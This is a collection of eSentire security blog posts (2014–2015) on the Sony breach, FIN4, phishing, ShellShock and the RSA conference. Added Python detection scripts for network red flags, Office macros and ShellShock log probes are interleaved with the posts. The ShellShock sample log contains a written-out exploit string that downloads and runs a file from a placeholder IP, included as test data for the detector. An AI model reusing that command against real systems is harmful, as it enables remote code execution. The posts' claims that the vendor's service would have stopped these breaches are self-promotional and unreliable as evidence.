eSentire Blog

Would Active Threat Protection from eSentire Have Prevented the Sony Hack?

Posted by Mandy Bachus on Thu, Jan 15, 2015 @ 08:30 AM

by J.Paul Haynes

In the weeks that have passed since the well-publicized Sony breach I have been asked the same question dozens of times: could eSentire's services have prevented this breach? eSentire does not have all the details of this particular breach; we are relying on recent public comments by FBI Director James Comey and Sony's own CEO to make a determination. In short, there is a high probability that the type of threat Sony experienced would have been detected and contained had continuous monitoring, like that provided by eSentire, been in place.

Regardless of how the threat actors gained initial access to the network, the resulting breach would have taken several weeks to carry out, not days. The combination of state-of-the-art detection technologies and human monitoring, the core premise of Active Threat Protection, would have flagged the inconsistencies associated with the attack as they appeared.

When a breach of this level occurs there are several red flags that arise before the damage is done. The key to preventing a serious breach is to identify the significance of those red flags and actively mitigate the harm. Here are some examples of the inconsistencies that should have set off alarm bells:

1. Numerous external connections using non-company proxy servers (eSentire Solution: Network Interceptor™ to identify the connection attempts, and Asset Manager Protect and Country Killer to recognize blacklisted IP addresses).

2. Lateral movement within the network originating from different hosts (eSentire Solution: Network Interceptor™ and Host Interceptor).

3. Deploying the exploit would have required numerous payload drops (eSentire Solution: Active Forensics, Network Interceptor™ and Executioner).

4. Changes in logging as privileges were escalated to gather the data to be extracted (eSentire Solution: Log Sentry™).

5. Finally, Active Threat Protection would have caught the exfiltration of roughly 100 TB of data, as described by Sony's CEO, and alerted a threat analyst (eSentire Solution: Active Forensics and Network Interceptor™).
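As an added example (not eSentire's code or any of the products named above), the script below scores the first, second and fifth red flags over a set of constructed connection records of the kind a network sensor would export: egress that bypasses the company proxy, destinations on a blocklist, one host fanning out to several internal peers on administrative ports, and a host pushing an implausible volume of data outbound. The internal range, the approved proxy name, the blocklisted address, the ports and the thresholds are all assumptions chosen for illustration; the third and fourth flags need host or log telemetry and are not covered here.

```python
"""Added example, not eSentire code: scoring the first, second and fifth red
flags above over constructed connection records. Internal range, approved
proxy, blocklist, ports and thresholds are all assumptions."""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("10.0.0.0/8")          # assumption: corporate address space
APPROVED_PROXIES = {"proxy.corp.example"}    # assumption: sanctioned egress proxy
BLOCKLIST = {ip_address("203.0.113.7")}      # assumption: a known-bad address (documentation range)
EXFIL_THRESHOLD = 50 * 1024**3               # bytes out per host per window before flagging
LATERAL_PORTS = {135, 139, 445, 3389, 5985}  # RPC, NetBIOS, SMB, RDP, WinRM
LATERAL_PEERS = 3                            # distinct internal peers before flagging


@dataclass(frozen=True)
class Conn:
    """One aggregated flow as a network sensor might export it (constructed)."""
    src: str
    dst: str
    dst_port: int
    bytes_out: int
    proxy: str = ""  # hostname of the proxy the flow traversed, "" for direct


def detect(conns):
    """Return {source host: sorted list of red flags} for hosts tripping any signal."""
    flags = defaultdict(set)
    outbound = defaultdict(int)   # total bytes each host sent outside the network
    peers = defaultdict(set)      # internal hosts each host touched on admin ports
    for c in conns:
        dst = ip_address(c.dst)
        if dst in INTERNAL:
            if c.dst_port in LATERAL_PORTS:
                peers[c.src].add(c.dst)
            continue
        outbound[c.src] += c.bytes_out
        if c.proxy not in APPROVED_PROXIES:
            flags[c.src].add("egress outside company proxy")
        if dst in BLOCKLIST:
            flags[c.src].add("blocklisted destination")
    for host, total in outbound.items():
        if total > EXFIL_THRESHOLD:
            flags[host].add("bulk exfiltration")
    for host, touched in peers.items():
        if len(touched) >= LATERAL_PEERS:
            flags[host].add("lateral movement")
    return {host: sorted(f) for host, f in flags.items()}


GIB = 1024**3
SAMPLE = [  # constructed records: one host doing all the wrong things, one normal user
    Conn("10.1.2.3", "203.0.113.7", 443, 30 * GIB),
    Conn("10.1.2.3", "203.0.113.7", 443, 30 * GIB),
    Conn("10.1.2.3", "10.1.2.10", 445, 4096),
    Conn("10.1.2.3", "10.1.2.11", 445, 4096),
    Conn("10.1.2.3", "10.1.2.12", 3389, 8192),
    Conn("10.1.2.50", "198.51.100.20", 443, 12_000, proxy="proxy.corp.example"),
]

if __name__ == "__main__":
    for host, reasons in detect(SAMPLE).items():
        print(host, "->", ", ".join(reasons))
```

Each signal on its own is noisy (a backup server legitimately pushes terabytes; an admin jump host legitimately touches many peers on RDP); the point of the post is that one host tripping several of them within the same window is what an analyst should be looking at, which is why the function returns every flag per host rather than a single verdict.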

In the world of Active Threat Protection, we act on each of these signals immediately. The elements of this attack are what we detect and block every day. Intricate attacks such as these are becoming commonplace, so much so that leading analyst firm Gartner Research published a best practices framework in 2014 to help organizations defend against and mitigate these kinds of targeted attacks.

As we have seen in the case of Sony, the clean-up work after a breach is far more complex and expensive than the preventative measures that could have stopped this level of damage.

Without forensic-level network traffic at your disposal, tracking down the culprits and retrieving data is immeasurably more difficult, approaching impossible. In hindsight it is easy to say, "I should have had a working fire alarm," after a house fire. In the same way, we don't want a business to find out too late that it could have had measures in place to protect its high-value assets.

When we revisit the question of whether Active Threat Protection would help to prevent a breach like Sony’s, the answer is that every indicator points to yes.

J.Paul Haynes is CEO at eSentire.

Tags: Active Threat Protection, Data Breach

Just another day at the office: protecting clients from complex threat networks with Active Threat Protection from eSentire

Posted by Mandy Bachus on Wed, Dec 03, 2014 @ 02:38 PM

by J.Paul Haynes

On Dec. 1, a large US-based cybersecurity firm received extensive international media coverage for a report on a threat actor it classified as "FIN4". The report describes an active spear-phishing campaign specifically targeting "the emails of C-level executives, legal counsel, regulatory risk, and compliance personnel, and other individuals who would regularly discuss confidential, market-moving information".

The technique uses spear-phishing emails to harvest credentials from users and send them back to the FIN4 command-and-control (CnC) servers, where the login credentials are then used to log in to the users' webmail remotely through Tor and escalate the attack. This detail raised the level of angst further still.

While this news report may be the first public mention of "FIN4", eSentire has been tracking and mitigating this very activity for more than a year. Late in 2013, eSentire issued a service advisory to its client base giving visibility to a .docm file circulating through the hedge fund community. At the time, eSentire's Security Operations Center flagged what is now known as FIN4 activity at an early stage. The intent of the attack was the same then: a spear-phishing campaign aimed at accessing sensitive financial data in the hedge fund market through credential harvesting.

The story surrounding FIN4 is an important one, and a story like this reminds us of the complexity and challenges faced by the information security industry. Complicated threats like these don't pop up overnight. Dedicated forensics is critical in identifying and managing threats of this nature. eSentire clients have not been affected by FIN4 attacks thanks to our Security Operations Center's ongoing forensics and layered Active Threat Protection services.

What is it about the eSentire approach to Active Threat Protection that's so unique? We're able to see and mitigate threats of this nature through continuous monitoring. eSentire analysts continually monitor all of our clients' network traffic, looking for signs of atypical behavior by utilizing 'operationalized forensics', a technique pioneered by eSentire: the continuous analysis of all traffic flowing into and out of client networks.

As with the attack initially detected by eSentire in 2013, when the macro in a weaponized Word document executes, connects to an external server and transfers data, in this case user credentials to an unfamiliar IP destination, we notice those unusual behavioral signals and immediately scrutinize them.
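The .docm that carried the 2013 campaign is a zip-based OOXML package, and the macro it runs lives in a separate VBA part inside that package. As an added example (not eSentire's code or the original advisory), the script below shows the cheap first gate a mail gateway can apply before any network signal appears: open the attachment as a zip, look for a `vbaProject.bin` part and for the VBA content type declared in `[Content_Types].xml`, and decide on content rather than on the file extension, since a .docm renamed to .docx still carries its VBA part. The sample documents are constructed in memory and the filenames are made up.

```python
"""Added example, not eSentire code: checking whether an inbound Office
attachment carries a VBA project, the delivery vehicle described above.
Sample documents are constructed in memory; the filenames are made up."""
import io
import zipfile

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
MACRO_EXTENSIONS = (".docm", ".dotm", ".xlsm", ".xltm", ".pptm", ".potm")


def inspect_attachment(filename, data):
    """Report VBA indicators for an OOXML (zip-based) Office attachment."""
    report = {
        "filename": filename,
        "macro_extension": filename.lower().endswith(MACRO_EXTENSIONS),
        "vba_parts": [],            # zip entries holding the VBA project
        "vba_content_type": False,  # [Content_Types].xml declares a VBA part
        "error": None,
    }
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            report["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
            if "[Content_Types].xml" in names:
                types_xml = zf.read("[Content_Types].xml").decode("utf-8", "replace")
                report["vba_content_type"] = VBA_CONTENT_TYPE in types_xml
    except zipfile.BadZipFile:
        report["error"] = "not an OOXML container"
    report["has_macro"] = bool(report["vba_parts"]) or report["vba_content_type"]
    # A .docm renamed to .docx still carries its VBA part, so decide on content.
    report["extension_mismatch"] = report["has_macro"] and not report["macro_extension"]
    return report


def build_sample(with_macro):
    """Construct a minimal OOXML package; with_macro adds a placeholder VBA part."""
    overrides = [
        '<Override PartName="/word/document.xml" '
        'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    ]
    if with_macro:
        overrides.append(f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            + "".join(overrides) + "</Types>",
        )
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Real VBA projects are OLE compound files; only the magic bytes are mimicked here.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    for name, macro in (("Q3_positions.docm", True), ("Q3_positions.docx", False), ("renamed.docx", True)):
        r = inspect_attachment(name, build_sample(macro))
        print(name, "macro:", r["has_macro"], "mismatch:", r["extension_mismatch"])
```

Presence of a VBA part says nothing about what the macro does; real triage decompresses the VBA streams (the oletools `olevba` utility does this) to read the macro source and the addresses it contacts, which is the network behaviour the post describes catching on the wire.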

With our DVR-like capabilities, our skilled threat analysts rewind and replay the traffic and critically analyze it. If the traffic looks malicious, we block that specific connection on that customer’s network. Next, the block is propagated to all other eSentire subscriber networks through our Asset Manager Protect service, ensuring all clients are protected from the threat in question. At eSentire, this is standard operating procedure, 24/7/365, whether during business hours on Wednesday or at 2AM on Sunday.

If your first visibility into a major attack network like the one publicized this week comes from a best-in-class forensic firm, the horse is likely already out of the barn. At this stage of a breach you are also calling lawyers, regulators and law enforcement. Even worse, you will have spent at least three to five years' worth of what Active Threat Protection services from eSentire would have cost. Let's not rule out the impact to reputation and brand, which can be triggered in a New York minute.

With Active Threat Protection from eSentire, clients benefit from immediate threat isolation, mitigation and real-time reports. Quite literally we are talking about an ounce of prevention versus a pound of cure. 

There’s a reason why eSentire is the trusted, award-winning security services provider to more than 450 financial services firms, legal, extractive and healthcare organizations. We can comfortably lay claim to pioneering Continuous Advanced Threat Protection, which leading analyst firm Gartner Research began covering in June 2014 as a best practices framework for defending against cybersecurity attacks.

In our world, managing and mitigating a threat like “FIN4” is simply another day at the office.

J.Paul Haynes is CEO at eSentire.

Tags: Active Threat Protection

Phishing Expedition: Protect Your Organization from Phishing Exploits

Posted by Mandy Bachus on Mon, Nov 10, 2014 @ 04:35 PM

by Eric Ritter

Two months ago, Home Depot announced it had been the target of an elaborate hack through a third-party vendor. The attackers successfully embedded malware within thousands of self-checkout terminals across Canada and the United States, which silently harvested payment card information for months.

Just last week, new reports revealed more damage: in addition to the 56 million payment card accounts, the hackers also gained access to 53 million customer email addresses. In the case of the Home Depot hack, the criminals entered the enterprise with stolen vendor credentials, likely acquired through phishing.

The Home Depot hack is one of several attacks on major retailers this year. While businesses work to strengthen their cybersecurity posture, these attacks expose the vulnerabilities of supply and distribution chains and of the vendor systems used by countless organizations, regardless of industry.

Phishing scams are ubiquitous and often incredibly effective. 'Smash and grab' describes attacks aimed at a quick monetary return through access to specific financial data.

Spear-phishing is a sub-set of phishing now gaining momentum. These attacks are far more surgical and often take more effort to execute. They target specific individuals within an organization, such as a CFO or CEO. First the criminals gain access to the executive's email account. Next they drive the phishing campaign from it, usually by sending employees a document and requesting password confirmation for a records update. In most cases employees provide this information without hesitation, since the source appears to be trusted.

These attempts are far more sophisticated than historical bids involving lottery or inheritance claims. Today, what we see are polished emails, perfectly branded to reflect a legitimate organization, like a trusted credit card company, bank or other vendor.

The objective is always the same – convince the recipient to enter their credentials by requesting identity verification. In a business setting, employees sifting through hundreds of emails daily could see such an email as innocuous, and click a link or submit credentials without thinking twice.

At eSentire, we see thousands of phishing attempts every week, and more than a dozen custom-crafted spear-phishing attacks.

So what can you do to protect your organization from the onslaught of phishing campaigns seeking to disrupt it? In addition to robust cybersecurity policies, staff training and education are critical. Be sure to communicate cybersecurity risks and the nuances of phishing to employees at every level of the organization.

In an era of multi-tasking and heavy workloads, employees must remain vigilant and cautious of suspicious emails, since they are the first line of defence. Legitimate organizations do not ask clients or employees to confirm passwords or other credentials by replying to an email or following an emailed link. If ever in doubt, don't respond: an authentic request can be confirmed through another channel, such as a phone number you already have on file.

Our motto at eSentire: don’t take the bait and don’t click the link.

Eric Ritter is Director, Security Operations Center and Client Experience at eSentire.

Read more on phishing threats in this month's issue of HFMTechnology.


Tags: Spear Phishing attack

ShellShocked: The Effects and Implications of the New "ShellShock" Exploit

Posted by Mark J. McArdle on Fri, Sep 26, 2014 @ 11:19 AM

eSentire has visibility into significant activity related to the "ShellShock" exploit (CVE-2014-6271 & CVE-2014-7169).

Our take: ShellShock is a powerful remote code execution vulnerability affecting many systems running Bash on Linux and Mac OS X. While this vulnerability was publicly disclosed on September 24, it has the potential to be more damaging than Heartbleed. The primary resources at risk are Internet-facing services that invoke Bash (web servers handing requests to CGI scripts being the most common path), but there are also risks to consumers running Mac OS X and Linux on their laptops and desktops. While Heartbleed was a narrow and focused event exploited by those with extensive technical knowledge, ShellShock lets attackers with very basic programming knowledge run arbitrary commands on a remote system with whatever privileges the service that invoked Bash holds.

Take action: a patch for Bash is now available, and everyone should apply it as soon as possible. Note that the first fix for CVE-2014-6271 was incomplete, which is why CVE-2014-7169 was issued; make sure the update you apply covers both. Unfortunately, there currently isn't a patch available for Mac OS X. eSentire has outlined several proactive actions for enterprises and will continue to release updates on ShellShock as the situation develops.

eSentire Security Operations Center (SOC) analysts have real-time access to attack traffic through our full packet capture and archiving, and can investigate not just the superficial aspects of the attack reported in event logs but the specifics of the attack script: the payloads it may have downloaded, the commands it ran and the files it attempted to access. eSentire analysts also witnessed attackers performing reconnaissance and attempting to compromise systems by installing malware through simple scripts.
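As an added example (not eSentire's code or tooling), the script below shows how much of that specificity can be recovered from an ordinary web-server access log, and where the log falls short. It parses the Apache combined format, looks for the Bash function-export prefix `() {` in the User-Agent, Referer and request line, distinguishes the CVE-2014-6271 shape (a command appended after the closing `};`) from the malformed-function shape that CVE-2014-7169 used, and extracts the appended command so an analyst sees what the probe tried to run rather than only that a signature fired. The log lines are constructed and the addresses come from documentation ranges.

```python
"""Added example, not eSentire code: pulling ShellShock probes and their
command payloads out of Apache combined-format access logs. Log lines below
are constructed; addresses are from documentation ranges."""
import re

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>.*)"$'
)
# Bash parsed an exported variable starting with "() {" as a function definition.
# CVE-2014-6271: text after the closing "};" was executed as well.
# CVE-2014-7169: a malformed body such as "() { (a)=>\'" still confused the parser.
FUNC_START = re.compile(r"\(\)\s*\{")
TRAILING_CMD = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)$")


def classify(value):
    """Return (variant, payload) for one header or request value, or None if clean."""
    if not FUNC_START.search(value):
        return None
    m = TRAILING_CMD.search(value)
    if m:
        return ("CVE-2014-6271", m.group("cmd").strip())
    return ("CVE-2014-7169-style", value)


def scan(lines):
    """Return one hit per log line carrying a ShellShock probe in any inspected field."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these
        for field in ("ua", "ref", "req"):
            verdict = classify(m.group(field))
            if verdict:
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "field": field,
                             "variant": verdict[0], "payload": verdict[1]})
                break
    return hits


SAMPLE_LOG = r"""
198.51.100.4 - - [25/Sep/2014:03:10:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:03:14:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://203.0.113.9/x -O /tmp/x; chmod +x /tmp/x; /tmp/x'"
203.0.113.5 - - [25/Sep/2014:03:14:09 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { (a)=>\' /bin/sh -c 'id'" "curl/7.30.0"
""".strip().splitlines()

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h['ts']} {h['ip']} {h['field']} {h['variant']}: {h['payload']}")
```

The limitation is built into the input: only fields the server writes to its log are visible here, so a probe carried in a Cookie, Host or custom header never reaches this script, and the response the attacker's command produced is not recorded at all. That gap is the case the full packet capture described above is meant to cover.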

Our analysts interpret events in real time and utilize advanced tools that make security event information immediately actionable. In the case of ShellShock we were able to protect our client networks from potential exploits as they evolved. And with a capability we call Targeted Retrospection, we can rewind our analysis DVR-style to check whether any attacks were attempted before ShellShock was publicly disclosed; this helps us identify previously compromised systems and significantly reduces the impact of an attack.

While traditional log information can tell you that a specific attack signature fired, signatures are generalized to be useful against a class of exploit rather than a specific instance. When they get a hit, they record the event, but not the specifics of the attack payload. There is no forensic capability in a log file when it comes to attacks like this, and we don't think that's a very effective approach to Continuous Advanced Threat Protection.

In the meantime, you can learn more about ShellShock through these resources:

Mark J. McArdle serves as Chief Technology Officer for eSentire.

When Fiction Becomes Fact: Cyber Espionage on the Rise

Posted by Mandy Bachus on Wed, Aug 13, 2014 @ 04:23 PM

While cyber espionage has long been the lure of many thrilling Hollywood stories, it has fast become headline news, splattered regularly across the pages of national publications. Take this recent admission from the National Research Council (NRC) for example: Canada's premier research and technology organization announced a major IT systems breach, which allowed the perpetrators access to R&D data specific to aerospace, genetically modified foods, medical diagnostics and more. The Canadian government publicly singled out China, which in return denied the "groundless" allegations. This comes hot on the heels of the US Department of Justice's groundbreaking indictment of five Chinese army officers for alleged cybercrimes and cyber espionage.

As nation-state actors pursue government secrets, a slew of other threat actors lurk, quietly chasing intellectual property that is just as valuable. A Cyber Security Protection Alliance study found that last year 69% of Canadian businesses reported some kind of attack over a 12-month period. If recent news stories are any indication, this trend will continue its steep climb.

At eSentire, we continue to partner with a multitude of organizations that recognize the need to evaluate and augment their security posture. Whether financial institutions guarding trading data, law firms protecting client information or extractive industries battling hacktivists, our Active Threat Protection platform protects clients and prevents attacks with real-time detection and mitigation, 24/7. We keep our clients OUT of the headlines, and provide aggregate reports that detail each and every blocked attack.   

If cyber criminals can penetrate government infrastructure, they will easily (and successfully) target organizations with a weak security posture. This Fall, eSentire will appear at a variety of industry conferences providing a platform for cyber security discussion and understanding. Don’t wait to become a headline – get the information you need to improve your security posture today.

Tags: cyber security, Active Threat Protection, Cyber Espionage

The Cyber Security Grand Slam

Posted by Mark Sangster on Mon, Mar 31, 2014 @ 09:00 AM

The long winter is over: today is the official opening day of the 2014 major league baseball season. Here in the Toronto area we are cautiously optimistic over the Blue Jays’ prospects while thinking very fondly of the 1992-93 seasons.

Of course, back in the early 1990s cyber crime wasn’t the big deal it is today. Back then the interconnected world in which we now live was just starting to take shape. Today, everything from bank assets and personal credit card data to intellectual property and trade secrets all reside on corporate networks that clever cyber criminals relentlessly target.


At eSentire, it occurred to us that the game of baseball provides a good analogy for cyber security preparedness and attack response.

Maximizing your cyber security posture can be likened to rounding the bases:

  • First Base. Many security products and services will get you here. They monitor events and even stop threats with a known signature. This is a basic capability every company needs, but it only gets you to first base.
  • Second Base. Some products can detect threats that got by first base, usually by analyzing aggregated log data.
  • Third Base. There are services such as legacy Managed Security Services Providers (MSSP) that will notify you, via an automated alert, email, or a phone call, that a suspected breach has occurred.

Now what? Getting from third base back to home is the great conundrum of the cyber security industry.

The vast majority of cyber security products and services concentrate on prevention. Very few offer practical remediation assistance.

Once they’ve notified you, the MSSP considers their job done, but you’re stuck on third base while your systems are being ransacked.

Cyber security has become an incredibly complex field. The only way to fully address a serious security incident such as an advanced threat or a zero day attack is with the help of trained experts.

In baseball, a pinch hitter is such an expert, who acts as a substitute batter. The team manager can use any player who has not yet entered the game as a substitute, and the tactic is often used to place specialized skills (base hitting ability) at the plate when they are most needed.

When a cyber attack commences, companies are facing a crisis situation. They need cyber security pinch hitters on their team – and they need them now. At eSentire, we call this Active Intervention.

Our Network Interceptor solution includes the concept of Embedded Cyber Security Incident Response. That is, our experts are already on your team, monitoring network events in the background. When a real threat unfolds, they are like a pinch hitter: ready to enter the game and get you back to home plate.

Any company that relies on a cyber security program without Active Intervention is operating without a safety net. They are doomed to be stranded on, at best, third base when a difficult security incident happens.

It’s tough (and expensive) to bring in experts when they aren’t already on your team. This year, you can take steps to maximize your cyber security posture by incorporating Active Intervention into your security program.

Go Jays.

Tags: cyber security, Embedded CSIR, Cyber Security Incident Response

Notes from RSA: It's Not Your Security Budget, It's How You're Spending It

Posted by Mark Sangster on Wed, Mar 05, 2014 @ 10:02 AM

One resounding theme to emerge from this year’s RSA Conference is that IT security budgets are skewed too much towards automated prevention technology and not enough towards incident response.

In a keynote, Art Gilliland discussed this over-investment on the prevention side, noting that it consumes the overwhelming majority (86%) of annual cyber security spend.

An intriguing session on Security Shelfware detailed how a surprising number of SIEM (and other) security products end up gathering dust instead of being actively used.

In a panel discussion on cyber security incident response, Ponemon Institute founder Larry Ponemon explained what’s behind the scarcity of CSIRT resources, recommending greater investment in incident response.

Then, on the RSA’s final day, Jay Leek – CISO at Blackstone – weighed in from the user’s viewpoint: A CISO’s Perspective: Protecting with Enhanced Visibility and Response.

This valuable session argued for reallocating IT security investment, moving some money from Prevention (where a lot of shelfware exists) to Visibility, Intelligence – and the underfunded Reactive area, upgrading it to a Planned Response footing.

Leek noted that the cost of response has increased sharply, up 75% from $200k to $341k per incident as of 2011, and we can be certain that the cost in 2014 is even higher. Unfortunately, the cost to attackers is much lower. In one slide Leek showed that attackers could breach a company over 2,000 times before spending as much as the company spends on a single incident.

These trends are not sustainable, according to Leek. To mitigate such high costs, investment in incident response, not just prevention, is needed.

This investment can take a variety of forms.

  • For better Visibility, organizations should acquire technology that provides real time awareness of network events, thus collapsing the time delay inherent to SIEM products that rely on system and device logs.
  • For greater Intelligence, defenses can be tuned based on behaviors and attack profiles.
  • For Planned Response, you need trained security analysts who have ready, real time access to actionable forensics.

The market for Prevention-focused products is saturated – but for vendors it’s a lot easier to program a product to identify and stop known threats than it is to provide a solution to an incident that has unknown attributes.

Response is difficult to automate. For serious threats, effective response always requires human expertise. You need security analysts who know how to examine the forensics and what actions to take.

Having ready access to this kind of expertise is a challenge – as Jon Oltsik noted in his session on the Security Skills Shortage.

Small to midsize companies with stretched IT resources are particularly exposed in the skills area – how can they make the investments all of these speakers have recommended?

There’s good news. The new field of Active Threat Protection is designed for just this sort of balanced approach to cyber security.

Key attributes of Active Threat Protection include the acquisition of network data in real time, the ability to detect suspicious behaviors, and Active Forensics that help to eliminate false positives while highlighting the real potential threats.

These capabilities are topped off by Embedded Cyber Security Incident Response, which is the integration of trained security analysts into the mix as network events are being assessed – instead of after a crisis has erupted when it’s too late to minimize the damage.

Active Threat Protection is surprisingly affordable, giving companies a practical way to rebalance their IT security budgets for greater impact and better ROI as numerous RSA sessions have recommended.

It enables organizations to increase their Visibility, develop greater threat Intelligence, and include active expertise into their Planned Response processes – all of which dramatically reduces the cost of handling an incident while maximizing cyber security protection.

Tags: cyber security, Active Threat Protection, RSA, Cyber Security Incident Response

Notes from RSA: Investing in Silver Bullets

Posted by Mark Sangster on Thu, Feb 27, 2014 @ 09:00 PM

One of the most interesting keynotes at this year’s RSA conference was given by Art Gilliland, SVP of HP Enterprise Security Products, on Stop Looking for the Silver Bullet: Start Thinking Like a Bad Guy.

You can view a recording of his presentation here.

Gilliland noted the impossible odds that are stacked against cyber security teams, where to be considered successful the good guys have to win every time, but the bad guys only need to win once.

Despite increased investment in cyber security, the number of breaches continues to rise.

In looking at where this investment is going, HP and Ponemon Institute found that a whopping 86% of the cyber security budget goes toward prevention.

Further research revealed that companies could improve the ROI of their security budgets by shifting investment into the security intelligence system – the people and processes as well as the technology that must combine to protect the enterprise.

“We are over-invested in products,” said Gilliland, in the best sound bite of the session. At eSentire, we couldn’t agree more.

We’ve said for some time that security automation, by itself, doesn’t solve the problem. Automated products are notoriously difficult to tune and keep updated, and even so the cyber criminals have a habit of devising new ways to evade automated defenses.

Too often, organizations desperately want to believe they can buy a technology silver bullet for cyber security – and there are plenty of vendors who are happy to take their money. Yet the number of breaches continues to rise – what’s wrong with this picture?

Companies that rely solely on automated security products are nursing a false hope, not realizing how exposed they really are.

Of course, security automation is needed – and it is very useful in blocking known threats. But it isn’t a panacea. We agree that investments need to include good technology but also be more balanced towards the Security Intelligence System.

A new security concept reflects this reality. We call it Active Threat Protection. It is an approach that combines detection, analytics, and human experts to deliver a higher level of protection than is otherwise possible.

Active Threat Protection acknowledges that you cannot detect every threat, and that advanced threats only reveal themselves by behaviors. It is a more practical approach that recognizes the bad guys will at times succeed in penetrating your network – but you can still stop attacks and minimize exposure if you have invested properly in people and processes as well as analytics.

Companies need to stop chasing security technology silver bullets, because they cannot possibly prevent every attack – succeeding every time while the bad guys only need to succeed once – eventually there will be a breach.

With Active Threat Protection, they have a workable solution that acknowledges the realities of today’s cyber wars.

Tags: cyber security, Active Threat Protection, Data Breach, RSA

Notes from RSA: Incident Response Inequality

Posted by Mark Sangster on Wed, Feb 26, 2014 @ 06:37 PM

It’s Day 3 of RSA, and one of the highlights was a panel discussion on Why Cyber Incident Response Teams Get No Respect.

The session had great insights on how CSIRT can be improved, but we couldn’t help thinking that it also pointed out the inequality in CSIRT capabilities between large enterprises and midsize companies.

Supported by a fresh research report from the Ponemon Institute, a major finding was that more investment is needed in CSIRT if organizations are going to materially improve their response preparedness.

It goes without saying that some organizations may have more to invest than others.

When we look at the survey demographics, we see that 82% of the respondents were from companies with over 500 employees – and nearly two thirds were from 1000+ employee companies.

Even so, nearly half of those surveyed (45%) reported that their company has no one dedicated full time to incident response. A further 28% have one resource dedicated to CSIRT. So, the reality is that most companies get by with part time resources in this crucial area.

The study’s recommendation that organizations should invest more in CSIRT is spot on. In very large enterprises, this may be an exercise in raising awareness of the need at the C-level in order to garner support. But in many companies, it’s an exercise in finding budget that simply doesn’t exist.

A trenchant observation in the study is that it’s easier to dedicate budget to prevention, on the theory that if that money is well invested then response won’t be as necessary – because threats won’t morph into attacks.

However, this is a false hope. Every company needs a plan for and resources designated to incident response – because sooner or later they will have an incident to deal with.

It takes specialized expertise to respond quickly to a security incident – fully understanding what happened and confirming that the response was successful and “it’s safe to go back into the water.” For most companies, that means bringing in outside experts.

While affirming that using outside consultants to augment in-house staff is a best practice, the study pointed up two valid problems with retaining third party consultants for incident response help.

First, outside parties are unlikely to “have an understanding of the IT infrastructure they are investigating as well as the business running on top of it.” They need read-in time, right when a crisis is unfolding.


“A third-party contractor can lose precious time navigating to the resources they need. In addition, many of the tools and audit trails that are needed in order to respond effectively to an incident must be in place before the incident begins, and cannot be established on the fly during an incident.”

All this brings us back to the question – what is a midsize company with an already-stretched IT budget to do? It sounds like world-class CSIRT is only possible if you have lots of money.

Fortunately, there is a solution: Embedded Cyber Security Incident Response.

This new concept is part of the Active Threat Protection approach to cyber security. It includes technology that can aggregate network events and detect telltales of suspicious activity, coupled with trained security analysts who actively review these events as they happen – and take action if needed.

Embedded CSIR solves the problem of getting outside consultants up to speed on your IT infrastructure and business processes, because they are already there. It solves the problem of needing analytical tools and audit trails, because those are already there too.

At eSentire, we think Embedded CSIR also solves the inequality problem, because even midsize companies can access Active Threat Protection without breaking the bank.

Get this white paper to learn more about Embedded CSIR.

Tags: cyber security, Active Threat Protection, RSA, Embedded CSIR, Cyber Security Incident Response

Notes from RSA: Security Shelfware

Posted by Mark Sangster on Tue, Feb 25, 2014 @ 06:31 PM

An insightful and entertaining session at RSA today was Security Shelfware: Which Products Are Gathering Dust in the Shed and Why?

This topic really interests us at eSentire, because we conduct hundreds of Enterprise Vulnerability Assessments every year and more often than not we find security products turned off or otherwise on the shelf. We always wonder why a company would pay good money for a security product only to let it fall into disuse (or never really use it in the first place).

Presented by Javvad Malik of 451 Research, the session highlighted some very interesting findings from an original research study.

Many perfectly good security products become shelfware. They work as advertised, and companies buy them with every intention of getting useful value out of them – but somewhere along the line, something happens.

Not surprisingly (at least to us), SIEM products lead the field as those most likely to wind up on the shelf. We suspect a big reason is the notorious difficulty of tuning these systems. Tune the rules too aggressively and you get flooded with so many alerts that you can't possibly handle them all; too loosely and you miss the one alert you really needed.

This is corroborated by the finding that, in the research, one of the main reasons given for security shelfware is a lack of staff to use the product properly, and a lack of time or expertise to implement it properly. Keeping these systems updated and tuned is a highly complex, involved and never-ending task.

As we noted yesterday, cyber security analysis is an increasingly specialized skill, which was validated by Jon Oltsik’s presentation on The Security Staff and Skills Shortage is Worse than You Think! One of the points in that session was that too many false positives are hampering detection and response.

When you combine the two sessions, it’s easy to see why certain security products become shelfware. They may be doing exactly what they’re programmed to do, but if the user companies are stretched for time and resources, they simply won’t be able to analyze everything these products throw their way.

It’s no wonder that the 451 Research study found users’ number one attribute of a good security product to be “centralized (and actionable) reporting.” Beleaguered IT security staff do not need more alerts – they need fewer ones that they can action.

This was a huge disconnect in the study, where vendors rated “out of the box functionality” as the number one sign of a good product while users rated that attribute near the bottom.

Of course, the study pointed out many other interesting things – such as the fact that often companies buy a security product merely to satisfy a compliance requirement but then they end up not using it.

